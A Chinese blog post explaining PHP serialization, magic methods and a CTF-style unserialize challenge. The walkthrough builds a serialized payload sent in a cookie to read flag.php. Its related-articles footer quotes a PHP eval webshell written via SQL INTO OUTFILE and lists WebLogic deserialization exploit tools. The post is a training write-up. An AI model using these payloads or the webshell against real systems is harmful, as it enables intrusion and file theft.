UNSERIALIZE——反序列化漏洞

最新推荐文章于 2023-06-07 13:23:49 发布
最新推荐文章于 2023-06-07 13:23:49 发布
阅读量4.7k 收藏 8
点赞数 3
分类专栏: # php代码审计 文章标签: 白箱测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43264067/article/details/106216548
版权

Unserialize反序列化

什么是序列化?

序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。
【将状态信息保存为字符串】

简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中

什么是反序列化?

序列化就是将对象的状态信息转为字符串储存起来,那么反序列化就是再将这个状态信息拿出来使用。(重新再转化为对象或者其他的)
【将字符串转化为状态信息】
我们首先先认识一下一个函数
__FILE__


返回的是文件路径

show_source(__FILE__)


这是返回当前文件源码,在CTF大赛用的可能会很多

serialize()

将对象转化为字符串
当在php中创建了一个对象后,可以通过serialize()把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。

<?php
show_source(__FILE__);
class chybeta{
var $test = '123';
}
$class1 = new chybeta;
$class1_ser = serialize($class1);
echo "<hr>";
print_r($class1_ser);
?>

O:7:“chybeta”:1:{s:4:“test”;s:3:“123”;}

这串字符的含义:变量类型;
类名长度;类名;属性变量
{属性类型;属性名长度;属性名;属性值类型;属性值长度;属性值内容}
o  表示object对象
7   表示对象名称有7个字符
chybeta 对象名称
1  表示只有一个值
s 表示 string 字符串  
4  表示test  字符串长度

这个函数

unserialize()

和序列化的serialize()刚刚好相反,是将字符串转化为对象

print_r

输出非字符串

魔术方法

php中有一类特殊的方法叫“Magic function”(魔术方法), 这里我们着重关注一下几个:

__construct():当对象创建(new)时会自动调用。但在unserialize()时是不会自动调用的。(构造函数)
__destruct():当对象被销毁时会自动调用。(析构函数)
__wakeup() :如前所提,unserialize()时会自动调用。

还有一个__tostring(),只要调用了echo 来打印对象体,就回自动调用__tostring()

我们直接开始进入靶场

我们发现他是只要输入了source,就会进入第一个if分支
然后输出echo $s,再调用__tostring()方法,显示Readme.txt的内容

我们往下看,发现除了下面一个if分支,存在一个unserialize()函数
但是,它不存在echo;
我们继续往下看,发现


这里存在一个

<?php foreach($todos as $todo):?>
    <li><?=$todo?></li>
<?php endforeach;?>

而*

  • <?=$todo?>
  • *其实是等价于echo的,我们第二个if分支调用了 t o d o s , 刚 刚 好 这 里 它 用 ∗ ∗ f o r e a c h ( ) ∗ ∗ 也 调 用 了 todos,刚刚好这里它用**foreach()**也调用了 todos,foreach()todos

    我们可能不知道这个foreach()是干嘛的,我们直接百度,知道了它是一种遍历数组简便方法

    我们看完所有代码,是不是可以去控制第二个if分支条件中的$todos,来控制反序列化,让它去读取我们想让它读取的文件呢?

    我们首先先制作出序列化好的代码,修改代码,拿到序列化过后的字符串

    <?php
Class readme{
    public function __toString()
    {
        return highlight_file('Readme.txt', true).highlight_file($this->source, true);
    }
}
if(isset($_GET['source'])){
    $s = new readme();
    $s->source = 'flag.php';
	$s = [$s];
    echo serialize($s);
} ?>


    a:1:{i:0;O:6:“readme”:1:{s:6:“source”;s:8:“flag.php”;}}


    e2d4f7dcc43ee1db7f69e76303d0105c
    因为它源代码是进行了一次md5解密的,再加上一个substr(0,15)所以我们可以设置cookie传参中的$c的值了
    $c = e2d4f7dcc43ee1db7f69e76303d0105ca:1:{i:0;O:6:“readme”:1:{s:6:“source”;s:8:“flag.php”;}}

    因为cookie传参是要进行一次url编码的,我们编码一下,再传
    todos=e2d4f7dcc43ee1db7f69e76303d0105ca%3a1%3a%7bi%3a0%3bO%3a6%3a%22readme%22%3a1%3a%7bs%3a6%3a%22source%22%3bs%3a8%3a%22flag.php%22%3b%7d%7d

猫鼠信安
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
weblogic_unserialize_exploit:Java反序列化vul以进行weblogic利用
04-30
weblogic unserialize exploit java反序列化漏洞(CVE-2015-4852)的weblogic exploit命令回显exp 1.依赖组件 python 2.7 java 2. 程序说明 exploit方法来源于Freebuf的”Java反序列化漏洞之weblogic本地利用实现篇”,基于rebeyond大牛的研究和反编译WebLogic_EXP.jar实现的。 与rebeyond的方法相比,只提取了WebLogic_EXP.jar中用到的少数几个java class,使用python脚本来实现exploit。 根据网上和自己测试的weblogic反序列化漏洞,完善了CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2018-2628和CVE-2018-2893的批量检测脚本(weblogic_check_vuls.
反序列化漏洞原理和靶场实践
最新发布
09-26
反序列化漏洞原理和靶场实践 序列化和反序列化是 PHP 中两个基本概念。序列化是将对象的状态信息转换为可以存储或传输的形式的过程,而反序列化是将存储的状态信息重新转换为对象的过程。 序列化的过程可以将对象...
PiKachu靶场之PHP反序列化漏洞
angry_program的博客
02-22 1961
前言 在理解这个漏洞前,你需要先搞清楚php中serialize(),unserialize()这两个函数。 序列化serialize() 序列化说通俗点就是把一个对象变成可以传输的字符串,比如下面是一个对象: class S{ public $test="pikachu"; } $s=new S(); //创建一个对象 serialize(...
ctfshow 反序列化(254-278)
fainpo的博客
06-07 676
用 |O:4:"User":3:{s:8:"username";可以看到fuck成功替换成了loveU,s:4这里表示的是4个字符,但是由于我们替换了,变成了5个字符,他就只会看love,这个U就不会看了。一般有这种str_replace将4个字符,替换成5个字符,或者任意的,只要字符替换的个数不相等,都是字符串逃逸的应用场景。将会以我们构造的token为admin为准,后面的token为user的值他就会丢弃,因为我们已经闭合了。
__serialize和__unserialize魔术方法详解
yink12138的博客
01-05 1157
____serialize和__unserialize魔术方法详解
Web_php_unserialize
Welcome To Myon'Blog !
03-30 1280
一、知识基础讲解 1、三个魔术方法: (1)__construct()函数 (2)__destruct()函数 (3)__wakeup()函数 2、两个重要常见的PHP函数 (1)str_replace() 函数 (2)preg_match 函数 3、正则表达式 (1)基本模式匹配规则 (2)字符簇 (3)PHP正则表达式的内置通用字符簇表 (4)单个字符匹配 (5)其他常见正则表达式符号 (6)正则表达式中常用的模式修正符 代码审计与脚本编写详细过程 正则匹配的绕过
反序列化(Unserialize)漏洞详解
热门推荐
qq_49422880的博客
09-28 1万+
序列化和反序列化漏洞分析   序列化(serialize) 就将对象的状态信息转换为可以存储或传输的形式的过程 在序列化期间,对象将当前的状态写入到临时或持久性的存储区 【将状态信息保存为字符串】。   反序列化(unserialize) 就是把序列化之后的字符串在转化为对象。 其实在序列化的过程中是没有任何的漏洞的,产生漏洞的主要的原因就是在反序列化的过程中,通过我们的恶意篡改会产生魔法函数绕过,字符逃逸,远程命令执行等漏洞,最早发现这些漏洞的大佬是真的牛。 一、简单的魔法函数 魔法函数 调用
PHP反序列化漏洞.pdf
08-10
攻击者通常通过以下步骤利用反序列化漏洞: 1. **操纵序列化数据**:攻击者构造恶意的序列化字符串,其中包含可以触发恶意行为的类或方法。 2. **注入序列化数据**:将恶意的序列化数据注入到应用程序的反序列化...
PHP反序列化漏洞研究
06-17
PHP反序列化漏洞研究 PHP反序列化漏洞是指攻击者可以通过构造恶意的序列化数据来执行恶意代码或泄露敏感信息的漏洞。这种漏洞通常发生在使用PHP的serialize()和unserialize()函数时。 在PHP中,serialize()函数...
php反序列化逃逸1
08-03
}结束,后的字符串不影响正常的反序列化php反序列化逃逸知识点 - 属性逃逸般在数据先经过次 serialize 再经过 unserialize,在这个中间反序
PHP反序列化漏洞总结
坚持硬核
10-07 1万+
一、什么是序列化? 将php中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中。而反序列化就是将这个过程倒过来。 当在php中创建了一个对象后,可以通过serialize()把这个对象变成一个字符串,保存对象的值方便以后传递使用。 <?php class A{ public $test = 123; } $a = new A; $a_ser=ser...
CTF Web_php_unserialize 详细解题过程
m0_63028223的博客
04-16 3261
打开靶场地址,我们看到是一个php代码 我们首先利用kali虚拟机内的dirb,获取敏感信息,扫描网站敏感文件 扫描可以得出该网站下的文件,我将它复制在记事本中 发现一个数据库网站 获取到账号为root密码为空 登录数据库,在SQL出编写一句话木马,并执行。 SELECT "<?php eval(@$_POST['pass']); ?>" INTO OUTFILE '/tmp/test1.php' 接下来我们使用中国蚁剑,链接我们所编写的木马, SELECT "&
反序列化漏洞详解
qq_48904485的博客
03-21 2938
一、基础知识 1、序列化 序列化serialize() 序列化说通俗点就是把一个对象变成可以传输的字符串,序列化的目的是方便数据的传输和存储。在PHP应用中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。 常见的序列化格式: 二进制格式 字节数组 json字符串 xml字符串 比如下面是一个对象: class S{ public $test="pikachu"; } $s=new S(); //创建一个对象 serialize($s
unserialize() 函数
冷月醉雪的博客
04-26 7851
查看更多 https://www.yuque.com/docs/share/704b9677-67f0-4156-b81e-0e4cc4ec40ce
PHP反序列化漏洞解析
kali_Ma的博客
11-18 817
举一个最简单的例子,在C中,若要开发一个数据库,那么一定涉及到数据的存储,要将内存中的数据持久化的保存在磁盘中,这就要对数据的存储格式进行优化,比如使用结构体保存一个数据对象,结构体是存在默认对齐机制的,所以实际上结构体的大小会大于其中实际数据的大小,如果直接将结构体对象写在内存一定会造成内存空间的泄露,因此为了优化,可以将结构体存储的每个数据memcpy出,并紧凑排列并写入内存,这就是最简单的一种序列化。
unserialize3与反序列化漏洞零基础详解
sGanYu
09-08 2889
反序列化漏洞(序列化←→反序列化) 什么是序列化(serialize) 将对象的状态信息转换为可以存储或传输的形式的过程,简单来说,就是将状态信息保存为字符串 什么是反序列化(unserialize) 将字符串转换为状态信息
反序列化漏洞(例题 web unserialize3)(保姆级新手教程)(有些地方讲的不好不对,请批评指正)
qq_74035288的博客
04-25 93
我们不能直接反改序列化字符得到flag,因为看网站源码有--wakeup(),我们搜索,知道了,**__wakeup()**是PHP的一个魔法函数(一般魔法函数都以两条下划线开头),在进行unserialize。根据本题我们得到的序列化字符串,看到标准的格式:O:<类名的长度>:“<类名>”:<成员属性的个数>:{S:…类成员属性的个数的判断:class里定义了几个变量,就有几个类成员属性,所以我们由①式看到本题属性个数为1,我们改成2,或3或以上,就可以执行漏洞了。s:3:"111";
序列化与反序列化漏洞详解
m0_55854679的博客
03-13 9047
文章目录小知识漏洞原理序列化反序列化函数解析序列化:serialize()函数反序列化unserialize()函数魔术方法pikachu靶场练习1靶场练习2总结 小知识 weblogic反序列化漏洞漏洞挖掘较难。 与变量覆盖一样,并不是说具体的漏洞,而是与它的具体代码有关。 === 【比较 数值相等、类型相等】 == 【比较,数值相等】 = 【赋值 赋予数值】 => 【键值分离】 -> 【类里面的方法调用或者传参】 漏洞原理 序列化: 游戏的
php反序列化漏洞原理
08-09
PHP反序列化漏洞是一种安全漏洞,它利用了PHP中的反序列化函数unserialize()的特性。当我们从外部接收到一个序列化的数据,并使用unserialize()函数对其进行反序列化时,如果没有进行足够的验证和过滤,恶意用户可以构造一些特定的序列化数据,导致代码执行任意的PHP代码,从而可以进行远程代码执行、文件读写等攻击。 在引用中,演示了一个简单的反序列化漏洞的例子。通过序列化一个对象并使用echo serialize()将序列化后的字符串输出,然后使用unserialize()函数对其进行反序列化,从而恶意执行了"phpinfo();"。在引用中,展示了如何利用反序列化漏洞来执行任意代码,通过构造一个私有属性并使用urlencode()函数对序列化后的字符串进行编码。在引用中,展示了如何使用unserialize()函数对序列化的字符串进行反序列化。 综上所述,PHP反序列化漏洞的原理是当我们在反序列化一个恶意构造的序列化数据时,由于缺乏足够的验证和过滤,恶意用户可以通过构造特定的序列化数据来执行任意的PHP代码,从而导致安全漏洞的产生。为了防止这种漏洞的发生,我们应该对从外部接收的序列化数据进行严格的验证和过滤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

猫鼠信安

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值